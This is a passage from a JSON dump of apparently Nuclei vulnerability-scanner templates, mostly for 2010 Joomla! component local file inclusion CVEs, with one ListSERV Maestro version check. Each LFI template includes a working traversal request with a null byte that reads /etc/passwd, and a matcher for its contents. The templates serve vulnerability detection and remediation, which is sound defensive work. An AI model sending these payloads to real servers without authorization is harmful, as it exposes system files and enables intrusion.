medium\n description: A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.\n remediation: |\n Update to the latest version of Joomla! Component Archery Scores or apply the patch provided by the vendor.\n reference:\n - https://www.exploit-db.com/exploits/12282\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1718\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1718\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.81565\n cpe: cpe:2.3:a:lispeltuut:com_archeryscores:1.0.6:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: lispeltuut\n product: com_archeryscores\n tags: cve,cve2010,joomla,lfi,edb,lispeltuut\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ecd7446fef1ce54e4f4248ba012aa11ea08e53dd3f5a36fa12d01852d0bf6cd5022100d86f62c4cc116ef4a60241471d37ff8b72ad493ced0d7e6002f1c5ac3db35856:922c64590222798bb761d5b6d8e72950", "hash": "79a21719f00e5011d33d8b795e83bd0e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ea3" }, "name": "CVE-2010-1719.yaml", "content": "id: CVE-2010-1719\n\ninfo:\n name: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: |\n Apply the latest security patches or updates provided by the Joomla! Component MT Fire Eagle 1.2 vendor.\n reference:\n - https://www.exploit-db.com/exploits/12233\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1719\n - http://www.exploit-db.com/exploits/12233\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57850\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1719\n cwe-id: CWE-22\n epss-score: 0.01671\n epss-percentile: 0.87378\n cpe: cpe:2.3:a:moto-treks:com_mtfireeagle:1.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: moto-treks\n product: com_mtfireeagle\n tags: cve2010,cve,lfi,edb,joomla,moto-treks\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100efdd3798466d640e256d5a756ee7b624ed3eb6e4e1eff2d6307ab2bac89b607c022057069d8f4c691f3e6f4948c0d8355e3f992e8ff17c66ed10eec31c3abe925c60:922c64590222798bb761d5b6d8e72950", "hash": "fb0cad03f8823a2a9f71811cb417d648", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ea4" }, "name": "CVE-2010-1722.yaml", "content": "id: CVE-2010-1722\n\ninfo:\n name: Joomla! Component Online Market 2.x - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.\n remediation: |\n Apply the latest security patches or updates provided by Joomla! to fix the LFI vulnerability in the Online Market 2.x component.\n reference:\n - https://www.exploit-db.com/exploits/12177\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1722\n - http://www.exploit-db.com/exploits/12177\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57674\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1722\n cwe-id: CWE-22\n epss-score: 0.01242\n epss-percentile: 0.83996\n cpe: cpe:2.3:a:dev.pucit.edu.pk:com_market:2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dev.pucit.edu.pk\n product: com_market\n tags: cve,cve2010,joomla,lfi,edb,dev.pucit.edu.pk\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203f0d1de10ccaf9a9d9ed87e953e7cfe386fa078accae00d5db36ab20b676e4d20220323bb7687e98c78a52e9922aa6f83bb11e71e70f3896c302d1e67bc7b350fa86:922c64590222798bb761d5b6d8e72950", "hash": "4de74392caa6ed4179a5778d3fe265bd", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ea5" }, "name": "CVE-2010-1723.yaml", "content": "id: CVE-2010-1723\n\ninfo:\n name: Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can result in unauthorized access to sensitive files on the server, potentially leading to further compromise of the system.\n remediation: |\n Update to the latest version of the iNetLanka Contact Us Draw Root Map component or apply the patch provided by the vendor to fix the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12289\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1723\n - http://www.exploit-db.com/exploits/12289\n - http://www.vupen.com/english/advisories/2010/0926\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1723\n cwe-id: CWE-22\n epss-score: 0.01956\n epss-percentile: 0.87487\n cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_drawroot:1.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomlacomponent.inetlanka\n product: com_drawroot\n tags: cve,cve2010,joomla,lfi,edb,joomlacomponent.inetlanka\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402201f2f6d4b03887f91f05f31e90985ffe041fc19b52146f7a927b36a949b69b27502200af68b38786ac9d14967173b092a4efe378dbf324842eda5736934450c559c42:922c64590222798bb761d5b6d8e72950", "hash": "1e822ec333c86d778c0b1a21a41cd2de", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ea6" }, "name": "CVE-2010-1858.yaml", "content": "id: CVE-2010-1858\n\ninfo:\n name: Joomla! Component SMEStorage - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, leading to unauthorized access and potential data leakage.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/11853\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1858\n - http://packetstormsecurity.org/1003-exploits/joomlasmestorage-lfi.txt\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57108\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1858\n cwe-id: CWE-22\n epss-score: 0.01155\n epss-percentile: 0.84543\n cpe: cpe:2.3:a:gelembjuk:com_smestorage:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: gelembjuk\n product: com_smestorage\n tags: cve2010,cve,joomla,lfi,edb,packetstorm,gelembjuk\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210094404f0f2f56a48166becec496073702fc13c233b56b332a59b23f75f2e9e664022100a030d88a7de00e472b914f484390aaf26834775c6ffcaf7329883a6386f70366:922c64590222798bb761d5b6d8e72950", "hash": "82ad5a34c723c055791ac8ba24b054d5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ea7" }, "name": "CVE-2010-1870.yaml", "content": "id: CVE-2010-1870\n\ninfo:\n name: ListSERV Maestro <= 9.0-8 RCE\n author: b0yd\n severity: medium\n description: A struts-based OGNL remote code execution vulnerability exists in ListSERV Maestro before and including version 9.0-8.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade to a patched version of ListSERV Maestro that is not affected by this vulnerability.\n reference:\n - https://www.securifera.com/advisories/sec-2020-0001/\n - https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt\n - https://www.exploit-db.com/exploits/14360\n - http://confluence.atlassian.com/display/FISHEYE/FishEye+Security+Advisory+2010-06-16\n - http://blog.o0o.nu/2010/07/cve-2010-1870-struts2xwork-remote.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:N/I:P/A:N\n cvss-score: 5\n cve-id: CVE-2010-1870\n cwe-id: CWE-917\n epss-score: 0.06174\n epss-percentile: 0.92842\n cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: apache\n product: struts\n tags: cve,cve2010,packetstorm,edb,rce,listserv,ognl,apache\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/lui/\"\n - \"{{BaseURL}}/hub/\"\n\n extractors:\n - type: regex\n regex:\n - 'LISTSERV Maestro\\s+9\\.0-[123456780]'\n - 'LISTSERV Maestro\\s+[5678]'\n - 'Administration Hub 9\\.0-[123456780]'\n - 'Administration Hub [5678]'\n# digest: 4a0a00473045022009c28af24d49d9f2b2cd719eef0eab59eb17456cc5d44bc1d3fc2767d24ef9c4022100be33c84b0809ba11233918e74323b720e874f8870e0a84637e4a6b55f773050f:922c64590222798bb761d5b6d8e72950", "hash": "0373cf2c8a3724c373425973137ab354", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ea8" }, "name": "CVE-2010-1875.yaml", "content": "id: CVE-2010-1875\n\ninfo:\n name: Joomla! Component Property - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n This vulnerability can result in the exposure of sensitive data, such as configuration files, database credentials, or other sensitive information stored on the server.\n remediation: |\n To remediate this vulnerability, it is recommended to update the affected Joomla! component to the latest version or apply the necessary patches provided by the vendor.\n reference:\n - https://www.exploit-db.com/exploits/11851\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1875\n - http://www.exploit-db.com/exploits/11851\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57110\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1875\n cwe-id: CWE-22\n epss-score: 0.01222\n epss-percentile: 0.83839\n cpe: cpe:2.3:a:com-property:com_properties:3.1.22-03:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: com-property\n product: com_properties\n tags: cve2010,cve,joomla,lfi,edb,com-property\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502201680f40e20b2858e86788424a8a44bc6958af8559d3f80c705f1af1c7035951c0221009efb7b9e0216197bd0463ed5285897d4212bdd853eab1b1e11ac3a3ef59792b6:922c64590222798bb761d5b6d8e72950", "hash": "600310138b16f4156ce306314744e8b6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ea9" }, "name": "CVE-2010-1878.yaml", "content": "id: CVE-2010-1878\n\ninfo:\n name: Joomla! Component OrgChart 1.0.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: |\n Apply the latest patch or upgrade to a newer version of the Joomla! Component OrgChart to mitigate the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12317\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1878\n - http://packetstormsecurity.org/1004-exploits/joomlaorgchart-lfi.txt\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/58031\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1878\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.81565\n cpe: cpe:2.3:a:blueflyingfish.no-ip:com_orgchart:1.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: blueflyingfish.no-ip\n product: com_orgchart\n tags: cve,cve2010,lfi,edb,packetstorm,joomla,blueflyingfish.no-ip\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100dc5b682510b8bee3ed2a7bcec2db3688588e5cd495dbb210642e123af4e422c1022030a7073ddc270bea7a017af5c0334ff17b94e2c32f1bba9cd2cf581e1e3a997c:922c64590222798bb761d5b6d8e72950", "hash": "07db35ef266679fb2cc65db0268be7b7", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eaa" }, "name": "CVE-2010-1952.yaml", "content": "id: CVE-2010-1952\n\ninfo:\n name: Joomla! Component BeeHeard 1.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12239\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1952\n - http://www.exploit-db.com/exploits/12239\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57845\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1952\n cwe-id: CWE-22\n epss-score: 0.01242\n epss-percentile: 0.85196\n cpe: cpe:2.3:a:cmstactics:com_beeheard:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cmstactics\n product: com_beeheard\n tags: cve,cve2010,joomla,lfi,edb,cmstactics\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022061129aea74772e6b2b1371d4e9ba2aa09c9f71d86f09cf33e41a27be90867130022100d2644c5fc639b09a774b82d50f93ec5ca8f39406463ee51c885db6833b1deb61:922c64590222798bb761d5b6d8e72950", "hash": "6c829e2cc7d3629cbbd95b8f8237337f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eab" }, "name": "CVE-2010-1953.yaml", "content": "id: CVE-2010-1953\n\ninfo:\n name: Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can result in unauthorized access to sensitive files on the server, potentially leading to further compromise of the system.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12288\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1953\n - http://www.vupen.com/english/advisories/2010/0927\n - http://www.exploit-db.com/exploits/12288\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1953\n cwe-id: CWE-22\n epss-score: 0.05684\n epss-percentile: 0.93171\n cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multimap:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomlacomponent.inetlanka\n product: com_multimap\n tags: cve,cve2010,joomla,lfi,edb,joomlacomponent.inetlanka\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022038e7b2689d93babc89559d2862b8bc5b183cad389c6e2fed0700cefd3cf3dfdd022100fd31164f65dbbcb7da90ab8bfdc92b82e66296933e903952cbca8a4182cc9e4e:922c64590222798bb761d5b6d8e72950", "hash": "1481bccde9c5e6b1f05b5fcedb56c112", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eac" }, "name": "CVE-2010-1954.yaml", "content": "id: CVE-2010-1954\n\ninfo:\n name: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12287\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1954\n - http://www.exploit-db.com/exploits/12287\n - http://www.vupen.com/english/advisories/2010/0928\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1954\n cwe-id: CWE-22\n epss-score: 0.05684\n epss-percentile: 0.92564\n cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multiroot:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomlacomponent.inetlanka\n product: com_multiroot\n tags: cve,cve2010,edb,joomla,lfi,joomlacomponent.inetlanka\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f769f8a1c52b5139073110e5b1bc3a484baee903ba1809561054e734c9d3d59c022100a4b510ea0025aba39b8dd61d5873bb5a47fbd790635549a7cc6e85c770f691d0:922c64590222798bb761d5b6d8e72950", "hash": "acb15ecc6f0594bd5ace8c896c436f2e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ead" }, "name": "CVE-2010-1955.yaml", "content": "id: CVE-2010-1955\n\ninfo:\n name: Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12238\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1955\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57846\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1955\n cwe-id: CWE-22\n epss-score: 0.01671\n epss-percentile: 0.86287\n cpe: cpe:2.3:a:thefactory:com_blogfactory:1.1.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: thefactory\n product: com_blogfactory\n tags: cve,cve2010,lfi,edb,joomla,thefactory\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b23a4aac6fedfb37e15cc43e7f51bf59ba413a099ae58090b05ee9be66d60314022100cfad298dd85b0b1b0cb1046b79e4e8822f005cb18b4081f3c898c3397cdbcc31:922c64590222798bb761d5b6d8e72950", "hash": "ae1f0d52362285cb32f98a1b44fa9592", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eae" }, "name": "CVE-2010-1956.yaml", "content": "id: CVE-2010-1956\n\ninfo:\n name: Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12285\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1956\n - http://www.exploit-db.com/exploits/12285\n - http://www.thefactory.ro/all-thefactory-products/gadget-factory-for-joomla-1.5.x/detailed-product-flyer.html\n - http://www.vupen.com/english/advisories/2010/0930\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1956\n cwe-id: CWE-22\n epss-score: 0.06055\n epss-percentile: 0.92761\n cpe: cpe:2.3:a:thefactory:com_gadgetfactory:1.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: thefactory\n product: com_gadgetfactory\n tags: cve,cve2010,joomla,lfi,edb,thefactory\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206e67b1c6317d9843ab60b722ade0f0942e4913d7c3f5630b1c8d19483f638f0c0221009162ad1fcb96f2a504a7f16e9805bc854997ba06eeb3c61adedbf42d4225287e:922c64590222798bb761d5b6d8e72950", "hash": "5b3c2ce2d42e139ef016ee936a16f0b7", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eaf" }, "name": "CVE-2010-1957.yaml", "content": "id: CVE-2010-1957\n\ninfo:\n name: Joomla! Component Love Factory 1.3.4 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12235\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1957\n - http://packetstormsecurity.org/1004-exploits/joomlalovefactory-lfi.txt\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57849\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1957\n cwe-id: CWE-22\n epss-score: 0.01671\n epss-percentile: 0.87378\n cpe: cpe:2.3:a:thefactory:com_lovefactory:1.3.4:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: thefactory\n product: com_lovefactory\n tags: cve,cve2010,lfi,edb,packetstorm,joomla,thefactory\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d140e4c1bf958b49625695ac09664cf37de408e74bc9902c319f6646d10d4de2022100e65a364df1072baccbf87a339592e9ecdd95de20e8dd4b705484ea97dafb2f70:922c64590222798bb761d5b6d8e72950", "hash": "47804f346f61c71fc4c4e1506ddeab1a", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eb0" }, "name": "CVE-2010-1977.yaml", "content": "id: CVE-2010-1977\n\ninfo:\n name: Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12083\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1977\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1977\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.80059\n cpe: cpe:2.3:a:gohigheris:com_jwhmcs:1.5.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: gohigheris\n product: com_jwhmcs\n tags: cve2010,cve,edb,joomla,lfi,gohigheris\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022040f7d241d5e5a884c1963854465cf4831f51f493d326d327351a68621b8ebc3e022100d1c7c3b472c326444bc1b1dd290db71df1dd2cade4f6d02d0d16e10f68ab869b:922c64590222798bb761d5b6d8e72950", "hash": "d362ebb8b9534fdb380091b33647a01c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eb1" }, "name": "CVE-2010-1979.yaml", "content": "id: CVE-2010-1979\n\ninfo:\n name: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12088\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1979\n - http://www.exploit-db.com/exploits/12088\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57570\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1979\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.81565\n cpe: cpe:2.3:a:affiliatefeeds:com_datafeeds:build_880:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: affiliatefeeds\n product: com_datafeeds\n tags: cve,cve2010,edb,joomla,lfi,affiliatefeeds\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: 